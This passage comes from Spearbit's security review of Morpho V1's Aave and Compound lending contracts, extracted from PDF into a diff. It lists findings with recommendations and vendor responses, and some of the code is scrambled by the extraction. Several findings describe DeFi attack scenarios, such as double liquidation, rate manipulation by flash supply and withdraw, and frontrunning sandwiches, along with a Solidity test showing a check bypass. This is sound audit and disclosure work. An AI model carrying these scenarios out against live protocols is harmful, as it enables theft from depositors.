Spearbit: Acknowledged. +5.6.7 User transfer AToken to Morpho or deposit on behalf of Morpho Severity: Informational Context: Protocol Level Description: Link to Aave LendinPool.sol onBehalfOf The address that will receive the aTokens, same as msg.sender if the user wants to receive them on his own wallet, or a different address if the beneficiary of aTokens is a different wallet This method could allow anyone to deposit some underlying on Aave, mint the respective AToken that will be transferred to Morpho (address(morphoPositionManager)). The result is the same as if someone would directly transfer to Morpho (address(morphoPositionManager)) some AToken. Consequences: • Morpho would have “stuck” free AToken on address(positionManager) that cannot be redeemed for under- lying. • Morpho’s health factor on Aave would be better because it’s like it’s supplying more collateral. Morpho: No real reason to fix this. It is true for all contracts. Spearbit: Acknowledged. 34 diff --git a/findings_newupdate/spearbit/MorphoV1-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/MorphoV1-Spearbit-Security-Review.txt new file mode 100644 index 0000000..6dceecf --- /dev/null +++ b/findings_newupdate/spearbit/MorphoV1-Spearbit-Security-Review.txt @@ -0,0 +1,51 @@ +5.1.1 Liquidating Morpho's Aave position leads to state desync Severity: High Risk Context: ExitPositionsManager.sol#L239 Description: Morpho has a single position on Aave that encompasses all of Morpho's individual user positions that are on the pool. When this Aave Morpho position is liquidated the user position state tracked in Morpho desyncs from the actual Aave position. This leads to issues when users try to withdraw their collateral or repay their debt from Morpho. It's also possible to double-liquidate for a profit. Example: There's a single borrower B1 on Morpho who is connected to the Aave pool. B1 supplies 1 ETH and borrows 2500 DAI. This creates a position on Aave for Morpho The ETH price crashes and the position becomes liquidatable. A liquidator liquidates the position on Aave, earning the liquidation bonus. They repaid some debt and seized some collateral for profit. This repaid debt / removed collateral is not synced with Morpho. The user's supply and debt balance remain 1 ETH and 2500 DAI. The same user on Morpho can be liquidated again because Morpho uses the exact same liquidation parameters as Aave. The Morpho liquidation call again repays debt on the Aave position and withdraws collateral with a second liquidation bonus. The state remains desynced. Recommendation: Liquidating the Morpho position should not break core functionality for Morpho users. Morpho: We will not implement any "direct" fix inside the code. Spearbit: Acknowledged. 5.2 Medium Risk +5.2.1 A market could be deprecated but still prevent liquidators to liquidate borrowers if isLiquidateBor- rowPaused is true Severity: Medium Risk Context: aave-v2/MorphoGovernance.sol#L358-L366, compound/MorphoGovernance.sol#L368-L376 Description: Currently, when a market must be deprecated, Morpho checks that borrowing has been paused before applying the new value for the flag. function setIsDeprecated(address _poolToken, bool _isDeprecated) external onlyOwner isMarketCreated(_poolToken) { } if (!marketPauseStatus[_poolToken].isBorrowPaused) revert BorrowNotPaused(); marketPauseStatus[_poolToken].isDeprecated = _isDeprecated; emit IsDeprecatedSet(_poolToken, _isDeprecated); The same check should be done in isLiquidateBorrowPaused, allowing the deprecation of a market only if isLiq- uidateBorrowPaused == false otherwise liquidators would not be able to liquidate borrowers on a deprecated market. Recommendation: Prevent the deprecation of a market if the isLiquidateBorrowPaused flag is set to true. Consider also checking the isDeprecated flag in the setIsLiquidateBorrowPaused to prevent pausing the liqui- dation if the market is deprecated. If Morpho implements the specific behavior should also be aware of the issue described in "setIsPausedForAllMarkets bypass the check done in setIsBorrowPaused and allow resuming bor- row on a deprecated market". 5 Morpho: We acknowledge this issue. The reason behind this is the following: given what @MathisGD said, if we want to be consistent we should prevent pausing the liquidation borrow on a deprecated asset. However, there might be an issue (we don't know) with the liquidation borrow and the operator would not be able to pause it. For this reason, we prefer to leave things as it is. Spearbit: Acknowledged. +5.2.2 setIsPausedForAllMarkets bypass the check done in setIsBorrowPaused and allow resuming borrow on a deprecated market Severity: Medium Risk Context: aave-v2/MorphoGovernance.sol#L470, compound/MorphoGovernance.sol#L470 Description: The MorphoGovernance contract allow Morpho to set the isBorrowPaused to false only if the market is not deprecated. function setIsBorrowPaused(address _poolToken, bool _isPaused) external onlyOwner isMarketCreated(_poolToken) { } if (!_isPaused && marketPauseStatus[_poolToken].isDeprecated) revert MarketIsDeprecated(); marketPauseStatus[_poolToken].isBorrowPaused = _isPaused; emit IsBorrowPausedSet(_poolToken, _isPaused); This check is not enforced by the _setPauseStatus function, called by setIsPausedForAllMarkets allowing Mor- pho to resume borrowing for deprecated market. Test to reproduce the issue // SPDX-License-Identifier: AGPL-3.0-only pragma solidity ^0.8.0; import "./setup/TestSetup.sol"; contract TestSpearbit is TestSetup { using WadRayMath for uint256; function testBorrowPauseCheckSkipped() public { // Deprecate a market morpho.setIsBorrowPaused(aDai, true); morpho.setIsDeprecated(aDai, true); checkPauseEquality(aDai, true, true); // you cannot resume the borrowing if the market is deprecated hevm.expectRevert(abi.encodeWithSignature("MarketIsDeprecated()")); morpho.setIsBorrowPaused(aDai, false); checkPauseEquality(aDai, true, true); // but this check is skipped if I call directly `setIsPausedForAllMarkets` morpho.setIsPausedForAllMarkets(false); // this should revert because // you cannot resume borrowing for a deprecated market checkPauseEquality(aDai, false, true); } function checkPauseEquality( address aToken, bool shouldBePaused, 6 bool shouldBeDeprecated ) public { ( bool isSupplyPaused, bool isBorrowPaused, bool isWithdrawPaused, bool isRepayPaused, bool isLiquidateCollateralPaused, bool isLiquidateBorrowPaused, bool isDeprecated ) = morpho.marketPauseStatus(aToken); assertEq(isBorrowPaused, shouldBePaused); assertEq(isDeprecated, shouldBeDeprecated); } } Recommendation: One possible solution is to follow the same approach implemented in the aave-v3 codebase. The update of the isBorrowPaused is done only and only if the market is not deprecated. Morpho: This issue has been fixed in PR 1642. Spearbit: Verified. +5.2.3 User withdrawals can fail if Morpho position is close to liquidation Severity: Medium Risk Context: ExitPositionsManager.sol#L468 Description: When trying to withdraw funds from Morpho as a P2P supplier the last step of the withdrawal algorithm borrows an amount from the pool ("hard withdraw"). If the Morpho position on Aave's debt / collateral value is higher than the market's max LTV ratio but lower than the market's liquidation threshold, the borrow will fail and the position can also not be liquidated. The withdrawals could fail. Recommendation: This seems hard to solve in the current system as it relies on the "hard withdraws" to always ensure enough liquidity for P2P suppliers. Consider ways to mitigate the impact of this problem. Morpho: Since Morpho will first launch on Compound (where there is only Collateral Factor), we will not focus now on this particular issue. Spearbit: Acknowledged. +5.2.4 P2P borrowers' rate can be reduced Severity: Medium Risk Original Context: (this area of the code has changed significantly since the initial audit, so maintaining the link to the original code base) MarketsManagerForAave.sol#L448 Context: aave-v2/InterestRatesManager.sol#L182 compound/InterestRatesManager.sol#L164 Description: Users on the pool currently earn a much worse rate than users with P2P credit lines. There's a queue for being connected P2P. As this queue could not be fully processed in a single transaction the protocol introduces the concept of a max iteration count and a borrower/supplier "delta" (c.f. yellow paper). This delta leads to a worse rate for existing P2P users. An attacker can force a delta to be introduced, leading to worse rates than before. Example: Imagine some borrowers are matched P2P (earning a low borrow rate), and many are still on the pool and therefore in the pool queue (earning a worse borrow rate from Aave). • An attacker supplies a huge amount, creating a P2P credit line for every borrower. (They can repeat this step several times if the max iterations limit is reached.) 7 • The attacker immediately withdraws the supplied amount again. The protocol now attempts to demote the borrowers and reconnect them to the pool. But the algorithm performs a "hard withdraw" as the last step if it reaches the max iteration limit, creating a borrower delta. These are funds borrowed from the pool (at a higher borrowing rate) that are still wrongly recorded to be in a P2P position for some borrowers. This increase in borrowing rate is socialized equally among all P2P borrowers. (reflected in an updated p2pBorrowRate as the shareOfDelta increased.) • The initial P2P borrowers earn a worse rate than before. If the borrower delta is large, it's close to the on-pool rate. • If an attacker-controlled borrower account was newly matched P2P and not properly reconnected to the pool (in the "demote borrowers" step of the algorithm), they will earn a better P2P rate than the on-pool rate they earned before. Recommendation: Consider mitigations for single-transaction flash supply & withdraw attacks. Morpho: We acknowledge the risk and won't be fixing this issue, as we might want to refactor the entire queue system at some point. Spearbit: Acknowledged. +5.2.5 Frontrunners can exploit system by not allowing head of DLL to match in P2P Severity: Medium Risk Context: MatchingEngine.sol Description: For a given asset x, liquidity is supplied on the pool since there are not enough borrowers. suppli- ersOnPool head: 0xa with 1000 units of x whenever there is a new transaction in the mempool to borrow 100 units of x, • Frontrunner supplies 1001 units of x and is supplied on pool. • updateSuppliers will put the frontrunner on the head (assuming very high gas is supplied). • Borrower's transaction lands and is matched 100 units of x with a frontrunner in p2p. • Frontrunner withdraws the remaining 901 left which was on the underlying pool. Favorable conditions for an attack: • Relatively fewer gas fees & relatively high block gas limit. • insertSorted is able to traverse to head within block gas limit (i.e length of DLL). Since this is a non-atomic sandwich, the frontrunner needs excessive capital for a block's time period. Recommendation: Consider mitigations for frontrunning sandwich attacks. Morpho: We acknowledge this issue and we are currently searching for better matching engine mechanisms. Though, as we must prevent the protocol from DDOs attacks a classic FIFO is not possible. We'll keep the matching engine like it is as the result of the front-running attack you mentioned is similar to a whale with huge capital which would be at the head of the list. Spearbit: Acknowledged. 8 +5.2.6 Differences between Morpho and Compound borrow validation logic Severity: Medium Risk Context: compound/PositionsManager.sol#L336-L344 Description: The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both logic, we have noticed that there are some differences between them; • Compound has a mechanism to prevent borrows if the new borrowed amount would go above the current borrowCaps[cToken] threshold. Morpho does not check this threshold and could allow users to borrow on the P2P side (avoiding the revert because it would not trigger the underlying compound borrow action). Morpho should anyway monitor the borrowCaps of the market because it could make increaseP2PDeltasLogic and _unsafeWithdrawLogic reverts. • Both Morpho and Compound do not check if a market is in "deprecated" state. This means that as soon as a user borrows some tokens, he/she can be instantly liquidated by another user. – If the flag is true on Compound, the Morpho User can be liquidated directly on compound. – If the flag is true on Morpho, the borrower can be liquidated on Morpho. • Morpho does not check if borrowGuardianPaused[cToken] on Compound, a user could be able to borrow in P2P while the cToken market has borrow paused. More information about detailed information can be found in the discussion topic "Differences in actions checks between Morpho and Compound". Recommendation: Consider implementing the missing logic/sanity checks or documenting why those checks should not be added to Morpho's implementation. Morpho: Here are the motivations behind not implementing the flags 1. No amount of checks will be sufficient, and the Morpho Operator should be proactive about pausing before the underlying pool does. 2. Hardcoding can actually reduce flexibility in Morpho's pausing discretion since one action on Morpho can actually constitute multiple types of interactions with the pool. 3. Some checks are gas intensive as information from the pool needs to be fetched. Spearbit: Acknowledged. +5.2.7 Users can continue to borrow from a deprecated market Severity: Medium Risk Context: aave-v2/MorphoGovernance.sol#L395 compound/MorphoGovernance.sol#L372 Description: When a market is being marked as deprecated, there is no verification that the borrow for that market has already been disabled. This means a user could borrow from this market and immediately be eligible to be liquidated. Recommendation: A couple of options: • Add a require or modifier to ensure borrow has been disabled, and revert if not. • Disable borrow as part of deprecating the market. Morpho: Fixed in PR 1551. Spearbit: Verified. After the PR change, to be able to deprecate a market, Morpho must pause the borrowing state; otherwise, the transaction will revert. When both the borrow state is paused and the market is deprecated, if Morpho wants to "reset" those values (borrow not paused, and the market is not deprecated), Morpho must "un-deprecate" it and only then "un-pause" it. 9 Note: Morpho should check that all the markets created are both not deprecated and not borrow-paused before deploying the PR to be sure to not enter a case where the new checks would not work or would prevent resetting the flags because the system is in an inconsistent state. +5.2.8 ERC20 with transfer's fee are not handled by *PositionManager Severity: Medium Risk Context: PositionsManager.sol, EntryPositionsManager.sol, ExitPositionsManager.sol Description: Some ERC20 tokens could have fees attached to the transfer event, while others could enable them in the future (see USDT, USDC). The current implementation of both PositionManager (for Aave and Compound) is not taking into consideration these types of ERC20 tokens. While Aave seems not to take into consideration this behavior (see LendingPool.sol), Compound, on the other hand, is explicitly handling it inside the doTransferIn function. Morpho is taking for granted that the amount specified by the user will be the amount transferred to the contract's balance, while in reality, the contract will receive less. In supplyLogic, for example, Morpho will account for the user's p2p/pool balance for the full amount but will repay/supply to the pool less than the amount accounted for. Recommendation: Consider updating the *PositionManager logic to track the real amount of token that has been sent by the user after the transfer (difference in before and after balance), but also the amount of tokens that have been supplied/borrowed/withdrawn/... given that Morpho itself is doing a second transfer/transferFrom to/from the Aave/Compound protocol. Morpho: We updated the asset listing checklist. However, given the small likelihood for USDC and USDT to turn on fees, we decided not to implement the recommendations. Spearbit: Verified the checklist, and Acknowledged the recommendations will not be implemented. +5.2.9 Cannot liquidate Morpho users if no liquidity on the pool Severity: Medium Risk Context: aave-v2/ExitPositionsManager.sol#L277 Description: Morpho implements liquidations by repaying the borrowed asset and then withdrawing the collateral If there is no liquidity in the collateral asset pool the asset from the underlying protocol (Aave / Compound). liquidation will fail. Morpho could incur bad debt as they cannot liquidate the user. The liquidation mechanisms of Aave and Compound work differently: They allow the liquidator to seize the debtorsTokens/cTokens which can later be withdrawn for the underlying token once there is enough liquidity in the pool. Technically, an attacker could even force no liquidity on the pool by frontrunning liquidations by borrowing the entire pool amount - preventing them from being liquidated on Morpho. However, this would require significant capital as collateral in most cases. Recommendation: Think about adding a similar feature where liquidators can seize aTokens/cTokens instead of withdrawing underlying tokens from the pool. The aTokens/cTokens of all pool users are already in the Morpho contract and thus in Morpho's control. Note that this would only work with onPool balances but not with inP2P balances as these don't mint aTokens/cTokens. Morpho: As it requires large changes in the liquidation process, we decided not to implement this recommendation on the current codebase. Spearbit: Acknowledged. 10 +5.2.10 Supplying and borrowing can recreate p2p credit lines even if p2p is disabled Severity: Medium Risk Context: compound/PositionsManager.sol#L258, compound/PositionsManager.sol#L354 aave-v2/EntryPositionsManager.sol#L117, aave-v2/EntryPositionsManager.sol#L215, Description: When supplying/borrowing the algorithm tries to reduce the deltas p2pBorrowDelta/p2pSupplyDelta by moving borrowers/suppliers back to P2P. It is not checked if P2P is enabled. This has some consequences related to when governance disables P2P and wants to put users and liquidity back on the pool through increaseDelta calls. The users could enter P2P again by supplying and borrowing. Recommendation: Disable matching the initial delta-matching step in supply and borrow if P2P is disabled. The reason why this only needs to be done for supply and borrow and not for repay and withdraw is that for repay and withdraw, while we're also reducing the delta, we're not actually creating new p2p credit lines (p2pAmount also decreases, so the diff is zero). It can be seen as if we're unmatching our own p2p balance, reducing the delta, shifting our p2p balance to on pool, and then withdrawing from the pool. Morpho: Fixed in PR 1453. Spearbit: Verified. +5.2.11 In Compound implementation, P2P indexes can be stale Severity: Medium Risk Context: PositionsManager.sol#L502-L505 MorphoUtils.sol#L119-L156, PositionsManager.sol#L344, PositionsManager.sol#L447, Description: The current implementation of MorphoUtils._isLiquidatable loops through all of the tokens in which the user has supplied to/borrowed from. The scope of the function is to check whether the user can be liquidated or not by verifying that debtValue > maxDebtValue. Resolving "Compound liquidity computation uses outdated cached borrowIndex" implies that the Compound bor- row index used is always up-to-date but the P2P issues associated with the token could still be out of date if the market has not been used recently, and the underlying Compound indexes (on which the P2P index is based) has changed a lot. As a consequence, all the functions that rely on _isLiquidatable (liquidate, withdraw, borrow) could return a wrong result if the majority of the user's balance is on the P2P balance (the problem is even more aggravated without resolving "Compound liquidity computation uses outdated cached borrowIndex". Let's say, for example: • Alice supplies ETH in pool • Alice supplies BAT in P2P • Alice borrows some DAI At some point in time the ETH value goes down, but the interest rate of BAT goes up. If the P2P index of BAT had been correctly up-to-date, Alice would have been still solvent, but she gets liquidated by Bob who calls liq- uidate(alice, ETH, DAI) Even by fixing "Compound liquidity computation uses outdated cached borrowIndex" Alice would still be liquidated because her entire collateral is on P2P and not in the pool. Recommendation: Consider following the same approach implemented in the Morpho-Aave implementation in- side MorphoUtils._liquidityData that will always be the token that the user has supplied/borrowed. Unlike Aave, Morpho's Compound implementation does not have a maximum hard-cap limit, which means that the _isLiquidatable loop could possibly revert because of an Out of Gas exception. 11 Ultimately, Morpho should always remember to always call updateP2PIndexes (for both Aave and Compound) before any logic inside the *PositionsManager (both Aave and Compound). Morpho: Because liquidators are updating indexed to be able to perform liquidations and because it would drasti- cally increase the gas cost, we decided not to implement this recommendation. Spearbit: Acknowledged. +5.2.12 Turning off an asset as collateral on Morpho-Aave still allows seizing of that collateral on Morpho and leads to liquidations Severity: Medium Risk Context: aave-v2/MorphoGovernance.sol#L407, aave-v2/MorphoUtils.sol#L285 Description: The Morpho Aave deployment can set the asset to not be used as collateral for Aave's Morpho contract position. On Aave, this prevents liquidators from seizing this asset as collateral. 1. However, this prevention does not extend to users on Morpho as Morpho has not implemented this check. Liquidations are performed through a repay & withdraw combination and withdrawing the asset on Aave is still allowed. 2. When turning off the asset as collateral, the single Morpho contract position on Aave might still be over- collateralized, but some users on Morpho suddenly lose this asset as collateral (LTV becomes 0) and will be liquidated. Recommendation: The feature does not work well with the current version of the Morpho Aave contracts. It must be enabled right from the beginning and may not be set later when users are already borrowing against the asset as collateral on Morpho. Clarify when this feature is supposed to be used, taking into consideration the mentioned issues. Reconsider if it's required. Morpho: Fixed in PR 1542. Spearbit: Verified. +5.2.13 claimToTreasury(COMP) steals users' COMP rewards Severity: Medium Risk Context: compound/MorphoGovernance.sol#L414 Description: The claimToTreasury function can send a market's underlying tokens that have been accumulated in the contract to the treasury. This is intended to be used for the reserve amounts that accumulate in the contract from P2P matches. However, Compound also pays out rewards in COMP and COMP is a valid Compound market. Sending the COMP reserves will also send the COMP rewards. This is especially bad as anyone can claim COMP rewards on the behalf of Morpho at any time and the rewards will be sent to the contract. An attacker could even frontrun a claimToTreasury(cCOMP) call with a Comptroller.claimComp(morpho, [cComp]) call to sabotage the reward system. Users won't be able to claim their rewards. Recommendation: If Morpho wants to support the COMP market, consider separating the COMP reserve from the COMP rewards. Morpho: Given the changes to do and the small likelihood to set a reserve factor for the COMP asset and the awareness on our side about this, we decided not to implement it. Spearbit: Acknowledged. 12 +5.2.14 Compound liquidity computation uses outdated cached borrowIndex Severity: Medium Risk Context: compound/MorphoUtils.sol#L211 Description: The _isLiquidatable iterates over all user-entered markets and calls _getUserLiquidity- DataForAsset(poolToken) -> _getUserBorrowBalanceInOf(poolToken). However, it only updates the indexes of markets that correspond to the borrow and collateral assets. The _getUserBorrowBalanceInOf function computes the underlying pool amount of the user as userBorrowBalance.onPool.mul(lastPoolIndexes[_- poolToken].lastBorrowPoolIndex);. Note that lastPoolIndexes[_poolToken].lastBorrowPoolIndex is a value that was cached by Morpho and it can be outdated if there has not been a user-interaction with that market for a long time. The liquidation does not match Compound's liquidation anymore and users might not be liquidated on Morpho that could be liquidated on Compound. Liquidators would first need to trigger updates to Morpho's internal borrow indexes. Recommendation: To match Compound's liquidation procedure, consider using Compound's borrowIndex which might have been updated after Morpho updated its own internal indexes. function _getUserBorrowBalanceInOf(address _poolToken, address _user) internal view returns (uint256) { - + } Types.BorrowBalance memory userBorrowBalance = borrowBalanceInOf[_poolToken][_user]; return userBorrowBalance.inP2P.mul(p2pBorrowIndex[_poolToken]) + userBorrowBalance.onPool.mul(lastPoolIndexes[_poolToken].lastBorrowPoolIndex); userBorrowBalance.onPool.mul(ICToken(_poolToken).borrowIndex()); Morpho: Fixed in PR 1558. Spearbit: Verified. 5.3 Low Risk +5.3.1 HeapOrdering.getNext returns the root node for nodes not in the list Severity: Low Risk Context: HeapOrdering.sol#L328 Description: If an id does not exist in the HeapOrdering the getNext() function will return the root node uint256 rank = _heap.ranks[_id]; // @audit returns 0 as rank. rank + 1 will be the root if (rank < _heap.accounts.length) return getAccount(_heap, rank + 1).id; else return address(0); Recommendation: Consider returning the zero address if the rank variable is zero (the _id was not found). Morpho: This issue has been fixed in PR 107 and PR 1627. Spearbit: Verified. 13 +5.3.2 Heap only supports balances up to type(uint96).max Severity: Low Risk Context: HeapOrdering.sol#L9 Description: The current heap implementation packs an address and the balance into a single storage slot which If a token has 18 decimals, the largest restricts the balance to the uint96 type with a max value of ~7.9e28. balance that can be stored will be 7.9e10. This could lead to problems with a token of low value, for example, if 1.0 tokens are worth 0.0001$, a user could only store 7_900_000$. Recommendation: The Aave markets currently don't list a token of such low value. Check the token values before listing an Aave market on Morpho, or consider increasing the balance. Morpho: We updated the asset listing checklist, PR 6. Spearbit: Acknowledged. +5.3.3 Delta leads to incorrect reward distributions Severity: Low Risk Context: aave-v2/File.sol#L123 Description: Delta describes the amount that is on the pool but still wrongly tracked as inP2P for some users. There are users that do not have their P2P balance updated to an equivalent pool balance and therefore do not earn rewards. There is now a mismatch of this delta between the pool balance that earns a reward and the sum of pool balances that are tracked in the reward manager to earn that reward. The increase in delta directly leads to an increase in rewards for all other users on the pool. Recommendation: In a future version, think about distributing the share of the delta on the balance that earns rewards (delta / (onPool + delta)) to all P2P suppliers. Morpho: These are quite involved and difficult tasks that would require a lot of changes. For these reasons, we decided not to implement the recommendation. Spearbit: Acknowledged. +5.3.4 When adding a new rewards manager, users already on the pool won't be earning rewards Severity: Low Risk Context: aave-v2/MatchingEngine.sol#L315, compound/MatchingEngine.sol#L347 Description: When setting a new rewards manager, existing users that are already on the pool are not tracked and won't be earning rewards. Recommendation: There's currently no efficient way to fix this besides initializing the new reward manager with all users who are already on the pool. Users with large pool supplies can resupply / reborrow a tiny amount to the pool to be registered in the new rewards manager. Morpho: It was like this when Aave still had rewards. We have removed it for Aave in PR 1545 and PR 1538. For Compound, we acknowledge this issue. Users will be warned in any case before a rewards manager is set to 0. Spearbit: Verified the Aave rewards removal, and Acknowledged the approach for Compound. 14 5.4 Gas Optimization +5.4.1 liquidationThreshold computation can be moved for gas efficiency Severity: Gas Optimization Context: aave-v2/MorphoUtils.sol#L320-L323 Description: The vars.liquidationThreshold computation is only relevant if the user is supplying this asset. Therefore, it can be moved to the if (_isSupplying(vars.userMarkets, vars.borrowMask)) branch. Recommendation: Consider changing the code // Cache current asset collateral value. uint256 assetCollateralValue; if (_isSupplying(vars.userMarkets, vars.borrowMask)) { assetCollateralValue = _collateralValue( vars.poolToken, _user, vars.underlyingPrice, assetData.tokenUnit ); values.collateral += assetCollateralValue; // Calculate LTV for borrow. values.maxDebt += assetCollateralValue.percentMul(assetData.ltv); // Update LT variable for withdraw. if (assetCollateralValue > 0) values.liquidationThreshold += assetCollateralValue.percentMul( assetData.liquidationThreshold ); + + + + + } // Update debt variable for borrowed token. if (_poolToken == vars.poolToken && _amountBorrowed > 0) values.debt += (_amountBorrowed * vars.underlyingPrice).divUp(assetData.tokenUnit); - // Update LT variable for withdraw. - if (assetCollateralValue > 0) - - - assetData.liquidationThreshold ); values.liquidationThreshold += assetCollateralValue.percentMul( Morpho: Fixed in PR 1544. Spearbit: Verified. However, there is a further optimization that can be made. Sample code is provided in "liquidationThreshold computation can be moved for gas efficiency". +5.4.2 Add max approvals to markets upon market creation Severity: Gas Optimization Context: aave-v2/File.sol#L123 Description: Approvals to the Compound markets are set on each supplyToPool function call. Recommendation: Consider adding a single max approval of type(uint256).max once upon market creation in MorphoGovernance.createMarket to save gas, and remove the other approvals. The Aave-v2 contracts are already doing this. Morpho: Because it adds complexity to the upgrade process for a too small upside, we decided not to implement it. Spearbit: Acknowledged. 15 5.5 Informational +5.5.1 isP2PDisabled flag is not updated by setIsPausedForAllMarkets Severity: Informational Context: aave-v2/MorphoGovernance.sol#L466-L482, compound/MorphoGovernance.sol#L466-L482 Description: The current implementation of _setPauseStatus does not update the isP2PDisabled. When _- isPaused = false this is not a real problem because once all the flags are enabled (everything is paused), all the operations will be blocked at the root of the execution of the process. There might be cases instead where isP2PDisabled and the other flags were disabled for a market and Morpho want to enable all of them, resuming all the operations and allowing the users to continue P2P usage. In this case, Morpho would only resume operations without allowing the users to use the P2P flow. function _setPauseStatus(address _poolToken, bool _isPaused) internal { Types.MarketPauseStatus storage pause = marketPauseStatus[_poolToken]; pause.isSupplyPaused = _isPaused; pause.isBorrowPaused = _isPaused; pause.isWithdrawPaused = _isPaused; pause.isRepayPaused = _isPaused; pause.isLiquidateCollateralPaused = _isPaused; pause.isLiquidateBorrowPaused = _isPaused; // ... event emissions } Recommendation: Consider also updating the isP2PDisabled flag if the intended behavior of the function is to update all the flags of a market. Morpho: We acknowledge the risk and won't be fixing this issue. Spearbit: Acknowledged. +5.5.2 Differences between Morpho and Aave liquidate validation logic Severity: Informational Context: aave-v2/ExitPositionsManager.sol#L468 aave-v2/ExitPositionsManager.sol#L204-L287, aave-v2/ExitPositionsManager.sol#L643, Description: The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both logic, we have noticed that there are some differences between the logic Note: Morpho re-implements the liquidate function as a mix of • repay + supply operations on Aave executed inside _unsafeRepayLogic where needed • withdraw + borrow operations on Aave executed inside _unsafeWithdrawLogic where needed From _unsafeRepayLogic (repay + supply on pool where needed) • Because _unsafeRepayLogic internally call aave.supply the whole tx could fail in case the supplying has been disabled on Aave (isFrozen == true) for the _poolTokenBorrowed • Morpho is not checking that the Aave borrowAsset has isActive == true • Morpho do not check that remainingToRepay.rayDiv(poolIndexes[_poolToken].poolBorrowIndex) > 0. Trying to repay that amount to Aave would make the whole tx revert 16 • Morpho do not check that remainingToSupply.rayDiv(poolIndexes[_poolToken].poolSupplyIndex) > 0. Trying to borrow that amount to Aave would make the whole tx revert From _unsafeWithdrawLogic (withdraw + borrow on pool where needed) • Because _unsafeWithdrawLogic internally calls aave.borrow the whole tx could fail in case the borrowing has been disabled on Aave (isFrozen == true or borrowingEnabled == false) for the _poolTokenCol- lateral • Morpho is not checking that the Aave collateralAsset has isActive == true • Morpho do not check that remainingToWithdraw.rayDiv(poolIndexes[_poolToken].poolSupplyIndex) > 0. Trying to withdraw that amount from Aave would make the whole tx revert • Morpho do not check that remainingToBorrow.rayDiv(poolIndexes[_poolToken].poolBorrowIndex) > 0. Trying to borrow that amount from Aave would make the whole tx revert More information about detailed information can be found in the discussion topic "Differences in actions checks between Morpho and Aave". Recommendation: Consider implementing the missing logic/sanity checks or documenting why those checks should not be added to Morpho's implementation. Morpho: Here are the motivations behind not implementing the flags 1. No amount of checks will be sufficient, and the Morpho Operator should be proactive about pausing before the underlying pool does. 2. Hardcoding can actually reduce flexibility in Morpho's pausing discretion since one action on Morpho can actually constitute multiple types of interactions with the pool. 3. Some checks are gas intensive as information from the pool needs to be fetched. Spearbit: Acknowledged. +5.5.3 Differences between Morpho and Aave repay validation logic Severity: Informational Context: aave-v2/ExitPositionsManager.sol#L181-L197, aave-v2/ExitPositionsManager.sol#L643 Description: The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both logic, we have noticed that there are some differences between the logic Note: Morpho re-implement the repay function as a mix of repay + supply operations on Aave where needed • Both Aave and Morpho are not handling ERC20 token with fees on transfer • Because _unsafeRepayLogic internally call aave.supply the whole tx could fail in case the supplying has been disabled on Aave (isFrozen == true) • Morpho is not checking that the Aave market has isActive == true • Morpho do not check that remainingToRepay.rayDiv(poolIndexes[_poolToken].poolBorrowIndex) > 0. Trying to repay that amount to Aave would make the whole tx revert • Morpho do not check that remainingToSupply.rayDiv(poolIndexes[_poolToken].poolSupplyIndex) > 0. Trying to supply that amount to Aave would make the whole tx revert More information about detailed information can be found in the discussion topic "Differences in actions checks between Morpho and Aave". Recommendation: Consider implementing the missing logic/sanity checks or documenting why those checks should not be added to Morpho's implementation. 17 Morpho: Here are the motivations behind not implementing the flags 1. No amount of checks will be sufficient, and the Morpho Operator should be proactive about pausing before the underlying pool does. 2. Hardcoding can actually reduce flexibility in Morpho's pausing discretion since one action on Morpho can actually constitute multiple types of interactions with the pool. 3. Some checks are gas intensive as information from the pool needs to be fetched. Spearbit: Acknowledged. +5.5.4 Differences between Morpho and Aave withdraw validation logic Severity: Informational Context: aave-v2/ExitPositionsManager.sol#L154-L173, aave-v2/ExitPositionsManager.sol#L468 Description: The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both logic, we have noticed that there are some differences between the logic Note: Morpho re-implement the withdraw function as a mix of withdraw + borrow operations on Aave where needed • Both Aave and Morpho are not handling ERC20 token with fees on transfer • Because _unsafeWithdrawLogic internally calls aave.borrow the whole tx could fail in case the borrowing has been disabled on Aave (isFrozen == true or borrowingEnabled == false) • Morpho is not checking that the Aave market has isActive == true • Morpho do not check that remainingToWithdraw.rayDiv(poolIndexes[_poolToken].poolSupplyIndex) > 0. Trying to withdraw that amount from Aave would make the whole tx revert • Morpho do not check that remainingToBorrow.rayDiv(poolIndexes[_poolToken].poolBorrowIndex) > 0. Trying to borrow that amount from Aave would make the whole tx revert Note 1: Aave is NOT checking that the market isFrozen. This means that users can withdraw even if the market is active but frozen More information about detailed information can be found in the discussion topic "Differences in actions checks between Morpho and Aave". Recommendation: Consider implementing the missing logic/sanity checks or documenting why those checks should not be added to Morpho's implementation. Morpho: Here are the motivations behind not implementing the flags 1. No amount of checks will be sufficient, and the Morpho Operator should be proactive about pausing before the underlying pool does. 2. Hardcoding can actually reduce flexibility in Morpho's pausing discretion since one action on Morpho can actually constitute multiple types of interactions with the pool. 3. Some checks are gas intensive as information from the pool needs to be fetched. Spearbit: Acknowledged. 18 +5.5.5 Differences between Morpho and Aave borrow validation logic Severity: Informational Context: aave-v2/EntryPositionsManager.sol#L188-L280 Description: The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both logic, we have noticed that there are some differences between the logics Note: Morpho re-implement the borrow function as a mix of withdraw + borrow operations on Aave where needed • Both Aave and Morpho are not handling ERC20 token with fees on transfer • Morpho is not checking that the Aave market has isFrozen == false (check done by Aave on the borrow operation), users could be able to borrow in P2P even if the borrow is paused on Aave (isFrozen == true) because Morpho would only call the aave.withdraw (where the frozen flag is not checked) • Morpho do not check if market is active (would borrowingEnabled == false if market is not active?) • Morpho do not check if market is frozen (would borrowingEnabled == false if market is not frozen?) • Morpho do not check that healthFactor > GenericLogic.HEALTH_FACTOR_LIQUIDATION_THRESHOLD • Morpho do not check that remainingToBorrow.rayDiv(poolIndexes[_poolToken].poolBorrowIndex) > 0. Trying to borrow that amount from Aave would make the whole tx revert More information about detailed 